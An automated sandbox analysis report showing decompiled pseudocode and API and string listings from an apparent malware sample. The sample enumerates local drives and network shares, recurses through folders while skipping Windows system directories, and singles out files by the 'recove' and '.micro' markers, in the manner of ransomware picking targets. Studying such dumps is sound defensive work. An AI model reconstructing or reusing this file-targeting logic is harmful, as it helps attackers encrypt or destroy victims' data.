0x00413b4d
0x00413b4f
0x00413b58
0x00413b5e
0x00413b65
0x00413d43
0x00413d56
0x00413d6f
0x00413d8a
0x00413d8f
0x00413d95
0x00413d98
0x00413da0
0x00413da0
0x00413da3
0x00413da6
0x00413daf
0x00413dc1
0x00413dc5
0x00413dca
0x00413ddb
0x00413dff
0x00413dff
0x00413e05
0x00413e0a
0x00000000
0x00413e0a
0x00413b6b
0x00413b6b
0x00413b71
0x00413b76
0x00413b76
0x00413b7c
0x00000000
0x00000000
0x00413b81
0x00413b98
0x00413b98
0x00413b83
0x00413b83
0x00413b83
0x00413b8b
0x00000000
0x00413b8d
0x00413b8d
0x00413b90
0x00413b96
0x00000000
0x00000000
0x00000000
0x00000000
0x00413b96
0x00413b8b
0x00413ba1
0x00413ba3
0x00413ba9
0x00413baf
0x00413bb4
0x00413bb4
0x00413bba
0x00000000
0x00000000
0x00413bbf
0x00413bd6
0x00413bd6
0x00413bc1
0x00413bc1
0x00413bc1
0x00413bc9
0x00000000
0x00413bcb
0x00413bcb
0x00413bce
0x00413bd4
0x00000000
0x00000000
0x00000000
0x00000000
0x00413bd4
0x00413bc9
0x00413bdf
0x00413be1
0x00413bf4
0x00413bf9
0x00413bfb
0x00413bfe
0x00413bfe
0x00413c01
0x00413c01
0x00413c04
0x00413c07
0x00413c13
0x00413c26
0x00413c2b
0x00413c2b
0x00413c41
0x00413c46
0x00413c49
0x00413c4f
0x00413c54
0x00413c54
0x00413c5a
0x00000000
0x00000000
0x00413c5f
0x00413c76
0x00413c76
0x00413c61
0x00413c61
0x00413c69
0x00000000
0x00413c6b
0x00413c6b
0x00413c6e
0x00413c74
0x00000000
0x00000000
0x00000000
0x00000000
0x00413c74
0x00413c69
0x00413c7f
0x00413c81
0x00413c87
0x00413c8d
0x00413c92
0x00413c92
0x00413c98
0x00000000
0x00000000
0x00413c9d
0x00413cb4
0x00413cb4
0x00413c9f
0x00413c9f
0x00413ca7
0x00000000
0x00413ca9
0x00413ca9
0x00413cac
0x00413cb2
0x00000000
0x00000000
0x00000000
0x00000000
0x00413cb2
0x00413ca7
0x00413cbd
0x00413cbf
0x00413cc5
0x00413ccb
0x00413cd0
0x00413cd0
0x00413cd6
0x00000000
0x00000000
0x00413cdb
0x00413cf2
0x00413cf2
0x00413cdd
0x00413cdd
0x00413ce5
0x00000000
0x00413ce7
0x00413ce7
0x00413cea
0x00413cf0
0x00000000
0x00000000
0x00000000
0x00000000
0x00413cf0
0x00413ce5
0x00413cfb
0x00413cfd
0x00413d0e
0x00413d13
0x00413d26
0x00413d2b
0x00413d35
0x00413e10
0x00413e10
0x00413e10
0x00000000
0x00413cfd
0x00413cf6
0x00413cf8
0x00000000
0x00413cf8
0x00000000
0x00413cbf
0x00413cb8
0x00413cba
0x00000000
0x00413cba
0x00000000
0x00413c81
0x00413c7a
0x00413c7c
0x00000000
0x00413c7c
0x00000000
0x00413be1
0x00413bda
0x00413bdc
0x00000000
0x00413bdc
0x00000000
0x00413ba3
0x00413b9c
0x00413b9e
0x00000000
0x00413b9e
0x00413e13
0x00413e21
0x00413e2a
0x00413e2a
0x00413e40

APIs

FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00413A19,00442040,00000001), ref: 00413B47
FindNextFileW.KERNEL32(00000000,00000010), ref: 00413E1B
FindClose.KERNEL32(00000000), ref: 00413E2A

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Strings

C:\Windows, xrefs: 00413C4F
\*.*, xrefs: 00413B20
.micro, xrefs: 00413DDD
recove, xrefs: 00413DCD
C:\Program Files, xrefs: 00413C8D
C:\ProgramData, xrefs: 00413CCB

Memory Dump Source

Source File: 00000000.00000002.227365714.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 00413AB0, Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 273

C-Code - Quality: 90%

			E00413AB0(intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				char _v8202;
				short _v8204;
				char _v16394;
				char _v16396;
				struct _WIN32_FIND_DATAW _v16988;
				void* _v16992;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t55;
				intOrPtr* _t71;
				char* _t85;
				char* _t86;
				intOrPtr* _t88;
				intOrPtr* _t92;
				intOrPtr* _t93;
				intOrPtr* _t94;
				intOrPtr* _t102;
				intOrPtr _t110;
				intOrPtr* _t114;
				intOrPtr* _t115;
				intOrPtr _t116;
				intOrPtr* _t118;
				intOrPtr* _t119;
				intOrPtr* _t120;
				void* _t128;
				void* _t131;
				signed int _t133;
				void* _t134;
				void* _t138;
				void* _t139;
				void* _t142;
				void* _t144;

				E0042E220(0x425c);
				_t55 =  *0x43f054; // 0xd46ffb00
				_v8 = _t55 ^ _t133;
				_t102 = _a4;
				_v8204 = 0;
				E0042D0A0( &_v8202, 0, 0x1ffe);
				_v16396 = 0;
				E0042D0A0( &_v16394, 0, 0x1ffe);
				E0042623B( &_v8204, 0x1000, _t102);
				_t124 =  &_v8204;
				E00425ACD( &_v8204, 0x1000, L"\\*.*");
				_t138 = _t134 + 0x30;
				_t131 = FindFirstFileW( &_v8204,  &_v16988);
				_v16992 = _t131;
				if(_t131 != 0xffffffff) {
					do {
						if((_v16988.dwFileAttributes & 0x00000010) == 0) {
							if(_a8 == 1) {
								E0042623B( &_v8204, 0x1000, _t102);
								E00425ACD( &_v8204, 0x1000, 0x43456c);
								E00425ACD( &_v8204, 0x1000,  &(_v16988.cFileName));
								_t71 =  &(_v16988.cFileName);
								_t142 = _t138 + 0x24;
								_t124 = _t71 + 2;
								do {
									_t110 =  *_t71;
									_t71 = _t71 + 2;
								} while (_t110 != 0);
								_t130 = (_t71 - _t124 >> 1) + 1;
								_t132 = E0042629E( &(_v16988.cFileName));
								E0042614E(_t75, (_t71 - _t124 >> 1) + 1);
								_t144 = _t142 + 0xc;
								if(E00413A40(L"recove", _t75) == 0 && E00413A40(L".micro", _t132) == 0 && E004142A0(_t132) == 1) {
									E00413E50( &_v8204);
								}
								E004258E3(_t132);
								_t131 = _v16992;
								goto L55;
							}
						} else {
							_t114 =  &(_v16988.cFileName);
							_t85 = ".";
							while(1) {
								_t124 =  *_t85;
								if(_t124 !=  *_t114) {
									break;
								}
								if(_t124 == 0) {
									L7:
									_t85 = 0;
								} else {
									_t16 =  &(_t85[2]); // 0x2e0000
									_t124 =  *_t16;
									if(_t124 !=  *((intOrPtr*)(_t114 + 2))) {
										break;
									} else {
										_t85 =  &(_t85[4]);
										_t114 = _t114 + 4;
										if(_t124 != 0) {
											continue;
										} else {
											goto L7;
										}
									}
								}
								L9:
								if(_t85 != 0) {
									_t115 =  &(_v16988.cFileName);
									_t86 = L"..";
									while(1) {
										_t124 =  *_t86;
										if(_t124 !=  *_t115) {
											break;
										}
										if(_t124 == 0) {
											L15:
											_t86 = 0;
										} else {
											_t19 =  &(_t86[2]); // 0x2e
											_t124 =  *_t19;
											if(_t124 !=  *((intOrPtr*)(_t115 + 2))) {
												break;
											} else {
												_t86 =  &(_t86[4]);
												_t115 = _t115 + 4;
												if(_t124 != 0) {
													continue;
												} else {
													goto L15;
												}
											}
										}
										L17:
										if(_t86 != 0) {
											E0042623B( &_v8204, 0x1000, _t102);
											_t88 = _t102;
											_t139 = _t138 + 0xc;
											_t22 = _t88 + 2; // 0x442042
											_t128 = _t22;
											do {
												_t116 =  *_t88;
												_t88 = _t88 + 2;
											} while (_t116 != 0);
											if(_t88 - _t128 >> 1 > 3) {
												E00425ACD( &_v8204, 0x1000, 0x43456c);
												_t139 = _t139 + 0xc;
											}
											E00425ACD( &_v8204, 0x1000,  &(_v16988.cFileName));
											_t138 = _t139 + 0xc;
											_t118 =  &_v8204;
											_t92 = 0x478238;
											while(1) {
												_t124 =  *_t92;
												if(_t124 !=  *_t118) {
													break;
												}
												if(_t124 == 0) {
													L27:
													_t92 = 0;
												} else {
													_t27 = _t92 + 2; // 0x0
													_t124 =  *_t27;
													if(_t124 !=  *((intOrPtr*)(_t118 + 2))) {
														break;
													} else {
														_t92 = _t92 + 4;
														_t118 = _t118 + 4;
														if(_t124 != 0) {
															continue;
														} else {
															goto L27;
														}
													}
												}
												L29:
												if(_t92 != 0) {
													_t119 =  &_v8204;
													_t93 = 0x47a238;
													while(1) {
														_t124 =  *_t93;
														if(_t124 !=  *_t119) {
															break;
														}
														if(_t124 == 0) {
															L35:
															_t93 = 0;
														} else {
															_t30 = _t93 + 2; // 0x0
															_t124 =  *_t30;
															if(_t124 !=  *((intOrPtr*)(_t119 + 2))) {
																break;
															} else {
																_t93 = _t93 + 4;
																_t119 = _t119 + 4;
																if(_t124 != 0) {
																	continue;
																} else {
																	goto L35;
																}
															}
														}
														L37:
														if(_t93 != 0) {
															_t120 =  &_v8204;
															_t94 = 0x47c238;
															while(1) {
																_t124 =  *_t94;
																if(_t124 !=  *_t120) {
																	break;
																}
																if(_t124 == 0) {
																	L43:
																	_t94 = 0;
																} else {
																	_t33 = _t94 + 2; // 0x0
																	_t124 =  *_t33;
																	if(_t124 !=  *((intOrPtr*)(_t120 + 2))) {
																		break;
																	} else {
																		_t94 = _t94 + 4;
																		_t120 = _t120 + 4;
																		if(_t124 != 0) {
																			continue;
																		} else {
																			goto L43;
																		}
																	}
																}
																L45:
																if(_t94 != 0) {
																	E00413AB0( &_v8204, _a8);
																	_t124 =  &_v8204;
																	E0042623B( &_v16396, 0x1000,  &_v8204);
																	_t144 = _t138 + 0x14;
																	E00413500( &_v16396);
																	L55:
																	_t138 = _t144 + 4;
																}
																goto L56;
															}
															asm("sbb eax, eax");
															asm("sbb eax, 0xffffffff");
															goto L45;
														}
														goto L56;
													}
													asm("sbb eax, eax");
													asm("sbb eax, 0xffffffff");
													goto L37;
												}
												goto L56;
											}
											asm("sbb eax, eax");
											asm("sbb eax, 0xffffffff");
											goto L29;
										}
										goto L56;
									}
									asm("sbb eax, eax");
									asm("sbb eax, 0xffffffff");
									goto L17;
								}
								goto L56;
							}
							asm("sbb eax, eax");
							asm("sbb eax, 0xffffffff");
							goto L9;
						}
						L56:
					} while (FindNextFileW(_t131,  &_v16988) != 0);
					_t64 = FindClose(_t131);
				}
				return E004256FE(_t64, _t102, _v8 ^ _t133, _t124, _t130, _t131);
			}

0x00413aba
0x00413abf
0x00413ac6
0x00413aca
0x00413ade
0x00413ae5
0x00413afc
0x00413b03
0x00413b18
0x00413b25
0x00413b31
0x00413b36
0x00413b4d
0x00413b4f
0x00413b58
0x00413b5e
0x00413b65
0x00413d43
0x00413d56
0x00413d6f
0x00413d8a
0x00413d8f
0x00413d95
0x00413d98
0x00413da0
0x00413da0
0x00413da3
0x00413da6
0x00413daf
0x00413dc1
0x00413dc5
0x00413dca
0x00413ddb
0x00413dff
0x00413dff
0x00413e05
0x00413e0a
0x00000000
0x00413e0a
0x00413b6b
0x00413b6b
0x00413b71
0x00413b76
0x00413b76
0x00413b7c
0x00000000
0x00000000
0x00413b81
0x00413b98
0x00413b98
0x00413b83
0x00413b83
0x00413b83
0x00413b8b
0x00000000
0x00413b8d
0x00413b8d
0x00413b90
0x00413b96
0x00000000
0x00000000
0x00000000
0x00000000
0x00413b96
0x00413b8b
0x00413ba1
0x00413ba3
0x00413ba9
0x00413baf
0x00413bb4
0x00413bb4
0x00413bba
0x00000000
0x00000000
0x00413bbf
0x00413bd6
0x00413bd6
0x00413bc1
0x00413bc1
0x00413bc1
0x00413bc9
0x00000000
0x00413bcb
0x00413bcb
0x00413bce
0x00413bd4
0x00000000
0x00000000
0x00000000
0x00000000
0x00413bd4
0x00413bc9
0x00413bdf
0x00413be1
0x00413bf4
0x00413bf9
0x00413bfb
0x00413bfe
0x00413bfe
0x00413c01
0x00413c01
0x00413c04
0x00413c07
0x00413c13
0x00413c26
0x00413c2b
0x00413c2b
0x00413c41
0x00413c46
0x00413c49
0x00413c4f
0x00413c54
0x00413c54
0x00413c5a
0x00000000
0x00000000
0x00413c5f
0x00413c76
0x00413c76
0x00413c61
0x00413c61
0x00413c61
0x00413c69
0x00000000
0x00413c6b
0x00413c6b
0x00413c6e
0x00413c74
0x00000000
0x00000000
0x00000000
0x00000000
0x00413c74
0x00413c69
0x00413c7f
0x00413c81
0x00413c87
0x00413c8d
0x00413c92
0x00413c92
0x00413c98
0x00000000
0x00000000
0x00413c9d
0x00413cb4
0x00413cb4
0x00413c9f
0x00413c9f
0x00413c9f
0x00413ca7
0x00000000
0x00413ca9
0x00413ca9
0x00413cac
0x00413cb2
0x00000000
0x00000000
0x00000000
0x00000000
0x00413cb2
0x00413ca7
0x00413cbd
0x00413cbf
0x00413cc5
0x00413ccb
0x00413cd0
0x00413cd0
0x00413cd6
0x00000000
0x00000000
0x00413cdb
0x00413cf2
0x00413cf2
0x00413cdd
0x00413cdd
0x00413cdd
0x00413ce5
0x00000000
0x00413ce7
0x00413ce7
0x00413cea
0x00413cf0
0x00000000
0x00000000
0x00000000
0x00000000
0x00413cf0
0x00413ce5
0x00413cfb
0x00413cfd
0x00413d0e
0x00413d13
0x00413d26
0x00413d2b
0x00413d35
0x00413e10
0x00413e10
0x00413e10
0x00000000
0x00413cfd
0x00413cf6
0x00413cf8
0x00000000
0x00413cf8
0x00000000
0x00413cbf
0x00413cb8
0x00413cba
0x00000000
0x00413cba
0x00000000
0x00413c81
0x00413c7a
0x00413c7c
0x00000000
0x00413c7c
0x00000000
0x00413be1
0x00413bda
0x00413bdc
0x00000000
0x00413bdc
0x00000000
0x00413ba3
0x00413b9c
0x00413b9e
0x00000000
0x00413b9e
0x00413e13
0x00413e21
0x00413e2a
0x00413e2a
0x00413e40

APIs

FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00413A19,00442040,00000001), ref: 00413B47
FindNextFileW.KERNEL32(00000000,00000010), ref: 00413E1B
FindClose.KERNEL32(00000000), ref: 00413E2A

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Strings

.micro, xrefs: 00413DDD
\*.*, xrefs: 00413B20
recove, xrefs: 00413DCD

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 00413840, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 156

C-Code - Quality: 95%

			E00413840() {
				signed int _v8;
				short _v1036;
				char _v1234;
				short _v1236;
				short _v1238;
				intOrPtr _v1242;
				intOrPtr _v1246;
				intOrPtr _v1250;
				intOrPtr _v1254;
				short _v1256;
				long _v1260;
				long _v1264;
				long _v1268;
				signed int _t35;
				intOrPtr _t38;
				WCHAR* _t45;
				WCHAR* _t46;
				int _t47;
				WCHAR* _t51;
				signed int _t53;
				WCHAR* _t55;
				intOrPtr* _t60;
				intOrPtr* _t61;
				short _t63;
				short _t64;
				short _t65;
				short _t67;
				short _t68;
				short* _t71;
				short _t72;
				short _t73;
				WCHAR* _t75;
				intOrPtr* _t76;
				long _t78;
				signed int _t79;
				signed int _t81;
				void* _t82;
				void* _t83;
				void* _t92;
				void* _t93;
				void* _t94;

				_t81 = (_t79 & 0xfffffff8) - 0x4f4;
				_t35 =  *0x43f054; // 0xd46ffb00
				_v8 = _t35 ^ _t81;
				E004233D0(0x442000, 3);
				_t38 =  *0x441d18; // 0x0
				_t78 = 0;
				_t82 = _t81 + 8;
				if( *((intOrPtr*)(_t38 + 4)) == 0) {
					L36:
					ExitThread(1);
				}
				GetLogicalDriveStringsW(0x100,  &_v1036);
				_t75 =  &_v1036;
				_v1236 = 0;
				E0042D0A0( &_v1234, 0, 0xc6);
				_t83 = _t82 + 0xc;
				_v1256 = 0;
				_v1254 = 0;
				_v1250 = 0;
				_v1246 = 0;
				_v1242 = 0;
				_v1238 = 0;
				_v1268 = 0;
				_v1264 = 0;
				_v1260 = 0;
				if(_v1036 == 0) {
					L33:
					E00413740(_t78);
					_t93 =  *0x462840 - _t78; // 0x0
					if(_t93 <= 0) {
						goto L36;
					}
					_t76 = 0x442040;
					do {
						E00413AB0(_t76, 1);
						_t78 = _t78 + 1;
						_t83 = _t83 + 8;
						_t76 = _t76 + 0x800;
						_t94 = _t78 -  *0x462840; // 0x0
					} while (_t94 < 0);
					goto L36;
				} else {
					do {
						_t60 = L"A:\\";
						_t45 = _t75;
						while(1) {
							_t67 =  *_t45;
							if(_t67 !=  *_t60) {
								break;
							}
							if(_t67 == _t78) {
								L8:
								_t45 = 0;
								L10:
								_t46 = _t75;
								if(_t45 != _t78) {
									_t61 = L"B:\\";
									while(1) {
										_t68 =  *_t46;
										if(_t68 !=  *_t61) {
											break;
										}
										if(_t68 == _t78) {
											L19:
											_t46 = 0;
											L21:
											if(_t46 != _t78) {
												_t47 = GetDriveTypeW(_t75);
												if(_t47 == 3 || _t47 == 4 || _t47 == 2) {
													if(GetVolumeInformationW(_t75,  &_v1236, 0xc8,  &_v1268,  &_v1264,  &_v1260,  &_v1256, 0x14) == 1) {
														E00413AB0(_t75, _t50);
														_t83 = _t83 + 8;
													}
												}
												_t51 = _t75;
												_t71 =  &(_t51[1]);
												do {
													_t63 =  *_t51;
													_t51 =  &(_t51[1]);
												} while (_t63 != _t78);
												goto L32;
											}
											_t55 = _t75;
											_t71 =  &(_t55[1]);
											do {
												_t64 =  *_t55;
												_t55 =  &(_t55[1]);
											} while (_t64 != _t78);
											goto L32;
										}
										_t72 = _t46[1];
										if(_t72 !=  *((intOrPtr*)(_t61 + 2))) {
											break;
										}
										_t46 =  &(_t46[2]);
										_t61 = _t61 + 4;
										if(_t72 != _t78) {
											continue;
										}
										goto L19;
									}
									asm("sbb eax, eax");
									asm("sbb eax, 0xffffffff");
									goto L21;
								}
								_t71 =  &(_t46[1]);
								do {
									_t65 =  *_t46;
									_t46 =  &(_t46[1]);
								} while (_t65 != _t78);
								goto L32;
							}
							_t73 = _t45[1];
							if(_t73 !=  *((intOrPtr*)(_t60 + 2))) {
								break;
							}
							_t45 =  &(_t45[2]);
							_t60 = _t60 + 4;
							if(_t73 != _t78) {
								continue;
							}
							goto L8;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						goto L10;
						L32:
						_t53 = _t51 - _t71 >> 1;
						_t92 =  *(_t75 + 2 + _t53 * 2) - _t78;
						_t75 = _t75 + 2 + _t53 * 2;
					} while (_t92 != 0);
					goto L33;
				}
			}

0x00413848
0x0041384e
0x00413855
0x00413866
0x0041386b
0x00413870
0x00413872
0x00413878
0x00413a2b
0x00413a2d
0x00413a2d
0x0041388b
0x0041389e
0x004138a5
0x004138aa
0x004138b3
0x004138b6
0x004138bb
0x004138bf
0x004138c3
0x004138c7
0x004138cb
0x004138d0
0x004138d4
0x004138d8
0x004138e4
0x004139fe
0x004139ff
0x00413a04
0x00413a0a
0x00000000
0x00000000
0x00413a0c
0x00413a11
0x00413a14
0x00413a19
0x00413a1a
0x00413a1d
0x00413a23
0x00413a23
0x00000000
0x004138ea
0x004138f0
0x004138f0
0x004138f5
0x004138f7
0x004138f7
0x004138fd
0x00000000
0x00000000
0x00413902
0x00413919
0x00413919
0x00413922
0x00413924
0x00413926
0x00413940
0x00413945
0x00413945
0x0041394b
0x00000000
0x00000000
0x00413950
0x00413967
0x00413967
0x00413970
0x00413972
0x0041398e
0x00413997
0x004139c9
0x004139cd
0x004139d2
0x004139d2
0x004139c9
0x004139d5
0x004139d7
0x004139e0
0x004139e0
0x004139e3
0x004139e6
0x00000000
0x004139e0
0x00413974
0x00413976
0x00413980
0x00413980
0x00413983
0x00413986
0x00000000
0x0041398b
0x00413952
0x0041395a
0x00000000
0x00000000
0x0041395c
0x0041395f
0x00413965
0x00000000
0x00000000
0x00000000
0x00413965
0x0041396b
0x0041396d
0x00000000
0x0041396d
0x00413928
0x00413930
0x00413930
0x00413933
0x00413936
0x00000000
0x0041393b
0x00413904
0x0041390c
0x00000000
0x00000000
0x0041390e
0x00413911
0x00413917
0x00000000
0x00000000
0x00000000
0x00413917
0x0041391d
0x0041391f
0x00000000
0x004139eb
0x004139ed
0x004139ef
0x004139f4
0x004139f4
0x00000000
0x004138f0

APIs

Part of subcall function 004233D0: GetTickCount.KERNEL32(?,?,?,?,0041386B,00442000,00000003), ref: 004233E1
Part of subcall function 004233D0: Sleep.KERNELBASE(0000000F), ref: 00423417

GetLogicalDriveStringsW.KERNEL32(00000100,?), ref: 0041388B
GetDriveTypeW.KERNEL32(?), ref: 0041398E
GetVolumeInformationW.KERNEL32(?,?,000000C8,?,?,?,?,00000014), ref: 004139C4

Part of subcall function 00413740: WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 00413764
Part of subcall function 00413740: GlobalAlloc.KERNEL32(00000040,00004000), ref: 0041377D
Part of subcall function 00413740: WNetEnumResourceW.MPR(FFFFFFFF,FFFFFFFF,00000000,00004000), ref: 004137AE
Part of subcall function 00413740: GlobalFree.KERNEL32(00000000), ref: 0041381A
Part of subcall function 00413740: WNetCloseEnum.MPR(FFFFFFFF), ref: 00413824

Part of subcall function 00413AB0: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00413A19,00442040,00000001), ref: 00413B47
Part of subcall function 00413AB0: FindNextFileW.KERNEL32(00000000,00000010), ref: 00413E1B
Part of subcall function 00413AB0: FindClose.KERNEL32(00000000), ref: 00413E2A

ExitThread.KERNEL32 ref: 00413A2D

Strings

A:\, xrefs: 004138F0
B:\, xrefs: 00413940

Memory Dump Source

Source File: 00000000.00000002.227365714.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 004256FE, Relevance: 7.6, APIs: 5, Instructions: 58

C-Code - Quality: 85%

			E004256FE(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x43f054; // 0xd46ffb00
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x440600 = _t6;
				 *0x4405fc = _t22;
				 *0x4405f8 = _t25;
				 *0x4405f4 = _t21;
				 *0x4405f0 = _t27;
				 *0x4405ec = _t26;
				 *0x440618 = ss;
				 *0x44060c = cs;
				 *0x4405e8 = ds;
				 *0x4405e4 = es;
				 *0x4405e0 = fs;
				 *0x4405dc = gs;
				asm("pushfd");
				_pop( *0x440610);
				 *0x440604 =  *_t31;
				 *0x440608 = _v0;
				 *0x440614 =  &_a4;
				 *0x440550 = 0x10001;
				_t11 =  *0x440608; // 0x0
				 *0x440504 = _t11;
				 *0x4404f8 = 0xc0000409;
				 *0x4404fc = 1;
				_t12 =  *0x43f054; // 0xd46ffb00
				_v812 = _t12;
				_t13 =  *0x43f058; // 0x2b9004ff
				_v808 = _t13;
				 *0x440548 = IsDebuggerPresent();
				_push(1);
				E0042C6AF(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x431324);
				if( *0x440548 == 0) {
					_push(1);
					E0042C6AF(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x004256fe
0x004256fe
0x004256fe
0x004256fe
0x004256fe
0x004256fe
0x004256fe
0x00425704
0x00425706
0x00425706
0x00426cea
0x00426cef
0x00426cf5
0x00426cfb
0x00426d01
0x00426d07
0x00426d0d
0x00426d14
0x00426d1b
0x00426d22
0x00426d29
0x00426d30
0x00426d37
0x00426d38
0x00426d41
0x00426d49
0x00426d51
0x00426d5c
0x00426d66
0x00426d6b
0x00426d70
0x00426d7a
0x00426d84
0x00426d89
0x00426d8f
0x00426d94
0x00426da0
0x00426da5
0x00426da7
0x00426daf
0x00426dba
0x00426dc7
0x00426dc9
0x00426dcb
0x00426dd0
0x00426de4

APIs

IsDebuggerPresent.KERNEL32 ref: 00426D9A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Memory Dump Source

Source File: 00000000.00000002.227365714.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 00426F58, Relevance: 4.6, APIs: 3, Instructions: 75

C-Code - Quality: 75%

			E00426F58(intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				char _v800;
				signed int _v804;
				struct _EXCEPTION_POINTERS _v812;
				void* __ebx;
				void* __edi;
				signed int _t37;
				char* _t42;
				char _t43;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				char* _t54;
				intOrPtr _t61;
				intOrPtr _t62;
				int _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				signed int _t67;
				signed int _t69;

				_t65 = __esi;
				_t61 = __edx;
				_t67 = _t69;
				_t37 =  *0x43f054; // 0xd46ffb00
				_t38 = _t37 ^ _t67;
				_v8 = _t37 ^ _t67;
				_t51 = _a4;
				_push(_t62);
				if(_t51 != 0xffffffff) {
					E0042C6AF(_t38);
					_t53 = _t51;
				}
				_v804 = _v804 & 0x00000000;
				E0042D0A0( &_v800, 0, 0x4c);
				_v812.ExceptionRecord =  &_v804;
				_t42 =  &_v724;
				_v812.ContextRecord = _t42;
				_v548 = _t42;
				_v552 = _t53;
				_v556 = _t61;
				_v560 = _t51;
				_v564 = _t65;
				_v568 = _t62;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_t43 = _v0;
				_t54 =  &_v0;
				_v528 = _t54;
				_v724 = 0x10001;
				_v540 = _t43;
				_v544 =  *((intOrPtr*)(_t54 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _t43;
				_t63 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t63 == 0 && _t51 != 0xffffffff) {
					_push(_t51);
					_t47 = E0042C6AF(_t47);
				}
				_pop(_t64);
				_pop(_t52);
				return E004256FE(_t47, _t52, _v8 ^ _t67, _t61, _t64, _t65);
			}

0x00426f58
0x00426f58
0x00426f5b
0x00426f63
0x00426f68
0x00426f6a
0x00426f6e
0x00426f71
0x00426f75
0x00426f78
0x00426f7d
0x00426f7d
0x00426f7e
0x00426f90
0x00426f9b
0x00426fa1
0x00426faa
0x00426fb0
0x00426fb6
0x00426fbc
0x00426fc2
0x00426fc8
0x00426fce
0x00426fd4
0x00426fdb
0x00426fe2
0x00426fe9
0x00426ff0
0x00426ff7
0x00426ffe
0x00426fff
0x00427005
0x00427008
0x0042700b
0x00427011
0x0042701b
0x00427024
0x0042702d
0x00427036
0x0042703c
0x0042704a
0x0042704c
0x00427061
0x0042706c
0x0042706d
0x00427072
0x00427076
0x00427079
0x00427080

APIs

IsDebuggerPresent.KERNEL32(?,00000001,00000000), ref: 00427042
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042704C
UnhandledExceptionFilter.KERNEL32(?), ref: 00427059

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Memory Dump Source

Source File: 00000000.00000002.227365714.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

